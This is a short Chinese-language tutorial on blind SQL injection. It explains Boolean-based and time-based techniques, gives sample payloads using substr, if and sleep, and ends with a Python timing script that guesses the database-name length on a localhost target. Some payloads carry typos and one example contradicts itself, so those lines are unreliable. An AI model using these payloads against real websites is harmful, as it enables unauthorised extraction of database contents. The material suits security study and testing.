SQL注入之盲注

一、Boolean型盲注

Boolean是基于真假的判断（true or false）;不管输入什么，结果都只返回真或假两种情况。Boolean型盲注的关键在于通过表达式结果与已知值进行比对，根据比对结果判断正确与否。

盲注有时需要一个一个字符去猜，因此一些字符串操作的函数经常被用到。

lenth(): 返回查询字符串长度
mid(column_name,start,length): 截取字符串
substr(string,satrt,length):  截取字符串
left(string,n): 截取字符串
ORD(): 返回字符串的ASCII码
ASCII()：返回字符串的ASCII码

举例

1 and length(database())=5   #先盲注获取长度
1 and substr(database(),1,1)='e'  如果正确响应结果，说明数据库名的第一个字符是s
1 and left((select database()),1)='s'
1 and (select substr(database(),1,1)='1') #构造更复杂的SQL语句

二、时间型盲注

Boolean盲注还是能通过页面返回的对错来判断，当页面任何信息都不返回的时候，就需要用时间盲注了。时间盲注就是在布尔盲注的基础上，首先经过真假的判断，然后在真假判断上添加时间的判断。

时间盲注所需函数大多与布尔相同。

length()：返回查询字符串长度
mid(column_name,start,length)：截取字符串
substr(string, start, length)：截取字符串
Left(string，n)：截取字符串
ORD()：返回字符的ASCii码
ASCII()：返回字符的ASCii码
if()：逻辑判断
sleep():控制时间
benchmark():控制时间

举例：

1 and if(length(database())=5,sleep(3),1)
1 and if(sustr(database(),1,1)='a',sleep(3),1)
1 and (select BENCHEMARK(50000000, (select username from user limit 1)))

根据sql盲注型编写的python脚本

import requests, time
for len in range(1, 50):
    start = time.time()
    header = {"Cookie":"PHPSESSID=××"}
    url = f"http://127.0.0.1/路径名?id=1 and if(length(database())={len}, sleep(3.5), 1)"
    resp = requests.get(url=url, headers=header)
    end = time.time()
    resptime = end-start
    if int(resptime) >= 3:
        print(len)
        break